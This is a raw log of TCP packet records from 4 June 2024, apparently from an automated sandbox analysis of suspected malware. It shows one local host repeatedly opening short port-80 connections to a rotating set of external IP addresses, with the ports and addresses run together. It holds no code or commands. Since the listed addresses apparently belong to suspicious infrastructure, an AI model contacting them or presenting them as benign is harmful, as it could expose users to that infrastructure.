                                        Jun 4, 2024 14:37:17.419621944 CEST4983480192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:17.421441078 CEST4983480192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:17.554893017 CEST804983423.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:17.705903053 CEST804983423.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:17.708128929 CEST804983423.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:17.708374023 CEST4983480192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:17.709011078 CEST4983480192.168.11.3023.82.12.29
                                        Jun 4, 2024 14:37:17.842334032 CEST804983423.82.12.29192.168.11.30
                                        Jun 4, 2024 14:37:22.902529001 CEST4983580192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:23.126997948 CEST804983591.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:23.127322912 CEST4983580192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:23.129023075 CEST4983580192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:23.353728056 CEST804983591.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:23.353740931 CEST804983591.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:23.353933096 CEST4983580192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:24.640218973 CEST4983580192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:25.658828020 CEST4983680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:25.884346008 CEST804983691.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:25.884561062 CEST4983680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:25.886507988 CEST4983680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:26.112297058 CEST804983691.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:26.112308979 CEST804983691.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:26.112448931 CEST4983680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:27.389636993 CEST4983680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:28.408042908 CEST4983780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:28.634233952 CEST804983791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:28.634500027 CEST4983780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:28.636523962 CEST4983780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:28.862906933 CEST804983791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:28.863012075 CEST804983791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:28.863023996 CEST804983791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:28.863033056 CEST804983791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:31.156652927 CEST4983880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:31.385803938 CEST804983891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:31.386097908 CEST4983880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:31.388113022 CEST4983880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:31.617096901 CEST804983891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:31.617109060 CEST804983891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:31.617424011 CEST4983880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:31.619937897 CEST4983880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:37:31.848596096 CEST804983891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:37:36.942558050 CEST4983980192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:37.116033077 CEST8049839162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:37.116302967 CEST4983980192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:37.118160009 CEST4983980192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:37.291570902 CEST8049839162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:37.291728020 CEST8049839162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:37.291742086 CEST8049839162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:37.291877985 CEST8049839162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:37.292097092 CEST4983980192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:38.621515036 CEST4983980192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:39.639837980 CEST4984080192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:39.806351900 CEST8049840162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:39.806504965 CEST4984080192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:39.808584929 CEST4984080192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:39.975032091 CEST8049840162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:39.975148916 CEST8049840162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:39.975162983 CEST8049840162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:39.975266933 CEST8049840162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:39.975364923 CEST4984080192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:39.975462914 CEST4984080192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:41.324031115 CEST4984080192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:42.342083931 CEST4984180192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:42.515254021 CEST8049841162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:42.515470982 CEST4984180192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:42.517452955 CEST4984180192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:42.690603018 CEST8049841162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:42.690614939 CEST8049841162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:42.690855026 CEST8049841162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:42.690869093 CEST8049841162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:42.690972090 CEST8049841162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:42.691039085 CEST4984180192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:42.691164970 CEST4984180192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:44.026530027 CEST4984180192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:45.044763088 CEST4984280192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:45.217943907 CEST8049842162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:45.218120098 CEST4984280192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:45.221573114 CEST4984280192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:45.394712925 CEST8049842162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:45.394918919 CEST8049842162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:45.394933939 CEST8049842162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:45.395042896 CEST8049842162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:45.395140886 CEST4984280192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:45.395303965 CEST4984280192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:45.397893906 CEST4984280192.168.11.30162.240.81.18
                                        Jun 4, 2024 14:37:45.571067095 CEST8049842162.240.81.18192.168.11.30
                                        Jun 4, 2024 14:37:52.402635098 CEST4984380192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:52.569231033 CEST8049843192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:37:52.569453955 CEST4984380192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:52.571449995 CEST4984380192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:52.740885019 CEST8049843192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:37:52.743582010 CEST8049843192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:37:52.743593931 CEST8049843192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:37:52.743778944 CEST4984380192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:54.086746931 CEST4984380192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:55.105202913 CEST4984480192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:55.271939993 CEST8049844192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:37:55.272140980 CEST4984480192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:55.275408983 CEST4984480192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:55.443315029 CEST8049844192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:37:55.445801020 CEST8049844192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:37:55.446145058 CEST8049844192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:37:55.446378946 CEST4984480192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:56.789294958 CEST4984480192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:57.807284117 CEST4984580192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:57.979731083 CEST8049845192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:37:57.979892969 CEST4984580192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:57.981617928 CEST4984580192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:58.154093981 CEST8049845192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:37:58.159210920 CEST8049845192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:37:58.159229040 CEST8049845192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:37:58.159403086 CEST4984580192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:37:59.491780996 CEST4984580192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:00.510143995 CEST4984680192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:00.677140951 CEST8049846192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:38:00.677305937 CEST4984680192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:00.679064989 CEST4984680192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:00.846048117 CEST8049846192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:38:00.849019051 CEST8049846192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:38:00.849031925 CEST8049846192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:38:00.849209070 CEST8049846192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:38:00.849379063 CEST4984680192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:00.849379063 CEST4984680192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:00.853908062 CEST4984680192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:01.020975113 CEST8049846192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:38:08.917093039 CEST4984780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:09.143685102 CEST804984791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:09.143940926 CEST4984780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:09.145692110 CEST4984780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:09.372328997 CEST804984791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:09.372344017 CEST804984791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:09.372797012 CEST4984780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:09.375189066 CEST4984780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:09.601699114 CEST804984791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:14.382070065 CEST4984880192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:14.499720097 CEST804984834.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:14.499948978 CEST4984880192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:14.501797915 CEST4984880192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:14.619445086 CEST804984834.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:14.649626017 CEST804984834.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:14.649689913 CEST804984834.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:14.649920940 CEST4984880192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:16.003638983 CEST4984880192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:17.022265911 CEST4984980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:17.139828920 CEST804984934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:17.139997005 CEST4984980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:17.141961098 CEST4984980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:17.259681940 CEST804984934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:17.288959980 CEST804984934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:17.289041042 CEST804984934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:17.289196014 CEST4984980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:18.643667936 CEST4984980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:19.661704063 CEST4985080192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:19.779489040 CEST804985034.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:19.779804945 CEST4985080192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:19.781563997 CEST4985080192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:19.899508953 CEST804985034.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:19.899519920 CEST804985034.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:19.925964117 CEST804985034.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:19.926084042 CEST804985034.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:19.926245928 CEST4985080192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:21.283724070 CEST4985080192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:22.301949024 CEST4985180192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:22.419727087 CEST804985134.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:22.420047998 CEST4985180192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:22.421736956 CEST4985180192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:22.539385080 CEST804985134.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:22.571403980 CEST804985134.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:22.571521044 CEST804985134.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:22.571747065 CEST4985180192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:22.574265003 CEST4985180192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:22.692101002 CEST804985134.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:27.582269907 CEST4985280192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:27.915441990 CEST8049852160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:27.915740013 CEST4985280192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:27.917610884 CEST4985280192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:28.260107040 CEST8049852160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:28.261450052 CEST8049852160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:28.261461973 CEST8049852160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:28.261718988 CEST4985280192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:29.422506094 CEST4985280192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:30.440915108 CEST4985380192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:30.753022909 CEST8049853160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:30.753236055 CEST4985380192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:30.755244017 CEST4985380192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:31.067385912 CEST8049853160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:31.068583965 CEST8049853160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:31.068597078 CEST8049853160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:31.068783998 CEST4985380192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:32.265624046 CEST4985380192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:33.284332037 CEST4985480192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:33.593512058 CEST8049854160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:33.593759060 CEST4985480192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:33.595810890 CEST4985480192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:33.904973030 CEST8049854160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:33.906240940 CEST8049854160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:33.906253099 CEST8049854160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:33.906621933 CEST4985480192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:35.108695030 CEST4985480192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:36.127343893 CEST4985580192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:36.476332903 CEST8049855160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:36.476607084 CEST4985580192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:36.478188992 CEST4985580192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:36.796966076 CEST8049855160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:36.798222065 CEST8049855160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:36.798343897 CEST8049855160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:36.798599005 CEST4985580192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:36.801328897 CEST4985580192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:37.122946978 CEST8049855160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:41.812889099 CEST4985680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:42.039410114 CEST804985691.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:42.039585114 CEST4985680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:42.041404009 CEST4985680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:42.268013000 CEST804985691.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:42.268026114 CEST804985691.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:42.268244028 CEST4985680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:43.544311047 CEST4985680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:44.562589884 CEST4985780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:44.787143946 CEST804985791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:44.787303925 CEST4985780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:44.789134979 CEST4985780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:45.014115095 CEST804985791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:45.014127970 CEST804985791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:45.014266968 CEST4985780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:46.293684959 CEST4985780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:47.311956882 CEST4985880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:47.540479898 CEST804985891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:47.540690899 CEST4985880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:47.542704105 CEST4985880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:47.771480083 CEST804985891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:47.771619081 CEST804985891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:47.771631002 CEST804985891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:47.771760941 CEST4985880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:49.058872938 CEST4985880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:50.076989889 CEST4985980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:50.303999901 CEST804985991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:50.304234028 CEST4985980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:50.305811882 CEST4985980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:50.532887936 CEST804985991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:50.532901049 CEST804985991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:50.533199072 CEST4985980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:50.535749912 CEST4985980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:50.762608051 CEST804985991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:55.544389009 CEST4986080192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:55.662069082 CEST8049860172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:55.662368059 CEST4986080192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:55.664139986 CEST4986080192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:55.781642914 CEST8049860172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:55.853091955 CEST8049860172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:55.853205919 CEST8049860172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:55.853353024 CEST4986080192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:55.854499102 CEST8049860172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:55.854688883 CEST4986080192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:57.166249990 CEST4986080192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:58.184721947 CEST4986180192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:58.315217018 CEST8049861172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:58.315418005 CEST4986180192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:58.317362070 CEST4986180192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:58.447762012 CEST8049861172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:58.581917048 CEST8049861172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:58.581938982 CEST8049861172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:58.582168102 CEST4986180192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:58.582370996 CEST8049861172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:58.582499027 CEST4986180192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:59.821907043 CEST4986180192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:00.840033054 CEST4986280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:00.975177050 CEST8049862172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:00.975373030 CEST4986280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:00.977001905 CEST4986280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:01.112159967 CEST8049862172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:01.112190962 CEST8049862172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:01.189018011 CEST8049862172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:01.189029932 CEST8049862172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:01.189203024 CEST4986280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:01.189870119 CEST8049862172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:01.190015078 CEST4986280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:02.493204117 CEST4986280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.511084080 CEST4986380192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.628321886 CEST8049863172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:03.628460884 CEST4986380192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.630337954 CEST4986380192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.747550011 CEST8049863172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:03.812156916 CEST8049863172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:03.812179089 CEST8049863172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:03.812442064 CEST8049863172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:03.812505007 CEST4986380192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.812563896 CEST4986380192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.816273928 CEST4986380192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.933356047 CEST8049863172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:08.822930098 CEST4986480192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:08.992937088 CEST8049864162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:08.993136883 CEST4986480192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:08.995440960 CEST4986480192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:09.163378954 CEST8049864162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:09.173477888 CEST8049864162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:09.173500061 CEST8049864162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:09.173672915 CEST4986480192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:10.507011890 CEST4986480192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:11.525823116 CEST4986580192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:11.706942081 CEST8049865162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:11.707159042 CEST4986580192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:11.709048986 CEST4986580192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:11.891921043 CEST8049865162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:11.910677910 CEST8049865162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:11.910733938 CEST8049865162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:11.910867929 CEST4986580192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:13.225112915 CEST4986580192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:14.243331909 CEST4986680192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:14.415451050 CEST8049866162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:14.415651083 CEST4986680192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:14.417556047 CEST4986680192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:14.597273111 CEST8049866162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:14.609250069 CEST8049866162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:14.609267950 CEST8049866162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:14.609380007 CEST4986680192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:15.927669048 CEST4986680192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:16.945769072 CEST4986780192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:17.113894939 CEST8049867162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:17.114072084 CEST4986780192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:17.115878105 CEST4986780192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:17.288316011 CEST8049867162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:17.297362089 CEST8049867162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:17.297439098 CEST8049867162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:17.297667027 CEST4986780192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:17.299918890 CEST4986780192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:17.477317095 CEST8049867162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:22.303935051 CEST4986880192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:22.528212070 CEST804986864.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:22.528496981 CEST4986880192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:22.530529022 CEST4986880192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:22.755132914 CEST804986864.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:22.755146980 CEST804986864.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:22.755445004 CEST4986880192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:24.035192013 CEST4986880192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:25.053425074 CEST4986980192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:25.278320074 CEST804986964.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:25.278573990 CEST4986980192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:25.280807018 CEST4986980192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:25.506483078 CEST804986964.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:25.506510973 CEST804986964.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:25.506650925 CEST4986980192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:26.784590006 CEST4986980192.168.11.3064.190.62.22
